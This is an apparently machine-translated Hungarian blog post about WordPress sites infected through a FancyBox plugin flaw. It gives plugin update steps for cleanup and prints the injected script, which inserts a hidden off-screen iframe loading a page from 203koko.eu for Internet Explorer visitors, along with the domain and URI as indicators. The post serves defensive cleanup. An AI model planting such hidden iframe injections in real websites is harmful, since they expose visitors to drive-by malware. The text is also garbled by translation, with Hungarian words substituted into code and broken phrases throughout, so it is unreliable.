[Malware iframe 203koko] Malware fertőzött WordPress oldalak

A hét elején számos honlapok és blogok WordPress, figyelmeztetéseket kaptak rosszindulatú fertőzés keresztül Google Webmasters.

A probléma, amelyre Google Webmasters utalt, a jelenléte tőkehal / forgatókönyv iframe rosszindulatú program a forrás honlapok.

<Script> ha (navigator.userAgent.match (/ MSIE / i)) {document.write ( „<div style = "position: abszolút; bal: -2000px; szélesség: 2000px"> <iframe src =„http: / /203koko.eu/hjnfh/ipframe2.php "width =" 20 "magasság =" 30 „> </ iframe> </ div>„); } </ Script>

Úgy tűnik, hogy ez egy sebezhetőség a csatlakoztatvívmányok FancyBox for WordPress ami egészen tegnapig (05.02.2015) nem frissült sokáig.
E probléma megoldása és fertőtlenítő vírusok oldalak ezzel a rosszindulatú programmal, viszonylag egyszerű.
1. Tiltsa le a FancyBox beépülő modult.
2. Törölje az összes FancyBox plugin fájlt a kiszolgálóról (FTP-n keresztül)
3. Telepítse a plugin új verzióját (Fancybox 3.0.4)

Fancybox a WordPress 3.0.4

- Átnevezte az 3.0.3-ban említett biztonsági problémával érintett beállítást. Ennek meg kell állítania, hogy a rosszindulatú kód megjelenjen azokon a webhelyeken, ahol a bővítmény frissítésre kerül a rosszindulatú kód eltávolítása nélkül.

Fancybox a WordPress 3.0.3

- Javítva egy biztonsági kérdés.

Malware információ:

TYPE: Iframe átirányítás
TARGET: Fancybox WordPress
KÁRTÉKONY DOMAIN: 203koko.eu
KÁRTÉKONY URI: http://203koko.eu/hjnfh/ipframe2.php
KÁRTÉKONY RAW KÓD: <iframe src = "http://203koko.eu/hjnfh/ipframe2.php" width = "20" magasság = "30"> </ iframe>
KÁRTÉKONY script: <script> if (navigator.userAgent.match (/ MSIE / i)) {document.write ('<div style = "position: absolute; left: -2000px; width: 2000px">

Eltávolítani malware WordPress honlapján.

[Malware iframe 203koko] Malware fertőzött WordPress oldalak

A szerzőről

Stealth LP

Alapítója és szerkesztője Stealth beállításokA 2006 dátumot.
Tapasztalat Linux operációs rendszerek (különösen a CentOS), a Mac OS X, Windows XP> Windows 10 és WordPress (CMS).

Leave a Comment